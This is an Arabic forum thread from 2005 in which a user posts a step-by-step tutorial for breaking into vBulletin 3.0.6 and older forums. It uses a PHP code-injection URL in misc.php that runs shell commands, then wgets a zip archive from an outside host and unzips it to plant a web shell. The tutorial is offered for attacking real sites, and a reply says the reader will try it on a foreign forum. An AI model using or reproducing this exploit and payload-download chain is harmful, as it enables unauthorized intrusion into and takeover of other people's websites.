منتديات سبيع الغلباء

منتديات سبيع الغلباء (https://www.sobe3.com/vb/index.php)
-   البرامج المجانية والكمبيوتر (https://www.sobe3.com/vb/forumdisplay.php?f=9)
-   -   شرح أجدد ثغرة في منتديات vBulletin بالصور (https://www.sobe3.com/vb/showthread.php?t=5285)

r00t l0v3r 17 - 03 - 2005 16:53

شرح أجدد ثغرة في منتديات vBulletin بالصور
 
بسم الله مع ثاني مشاركة أشرح لكم هذه الثغرة الخطيرة
نبدأ الشرح:::
أولا قم باختيار منتدى اصداره يكون 3.0.6 أو أقل
ثانياً ضع بعده هذا اللنك
misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=id
اذا طلع لك شاشة بيضاء يعني المنتدى غير مصاب بالثغرة أما إذا طلع لك :
[img]http://www.s4a.cc/up/images/vb1.GIF[/img]
فمعناه أن المنتدى مصاب بالثغرة
ثالثاً نقوم باستعراض مكاننا بالموقع بالأمر pwd فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=pwd
يطلع لك مثل الصورة:
[img]http://www.s4a.cc/up/images/vb2.GIF[/img]
نقوم بوضع الأمر wget [url]http://hkr-ksa.com/xp10/hitler.zip[/url]
فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=wget [url]http://hkr-ksa.com/xp10/hitler.zip[/url]
سيظهر لك شاشة بيضاء أعطيها مدة 5-10 ثواني ثم قم بوضع الأمر unzip hitler.zip فيصبح اللنك هكذا:
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=unzip hitler.zip
ستظهر لك مثل هذه الصورة:
[img]http://www.s4a.cc/up/images/vb3.GIF[/img]

مبرووك الآن اخترقت المنتدى رفعت الويب أدمن
الآن ادخل إلى :
[url]www.OOO.com/vb/khitler.php[/url]
واستمتع بالإختراق
* ملاحظة [url]www.OOO.com/vb[/url] استبدله بعنوان الموقع
---------------------
جميع الحقوق محفوظة لـX-jAyA-X
---------------------

خالد الشماسي 17 - 03 - 2005 17:33

رد : شرح أجدد ثغرة في منتديات vBulletin بالصور
 
شكرا لك


سأقوم بتطبيق ذلك على منتدى اجنبي واخبرك بالنتجية



لك تحياتي


الساعة الآن 03:59.

Powered by vBulletin® Version 3.8.11, Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. www.sobe3.com
جميع المشاركات تعبر عن وجهة كاتبها ،، ولا تتحمل ادارة شبكة سبيع الغلباء أدنى مسئولية تجاهها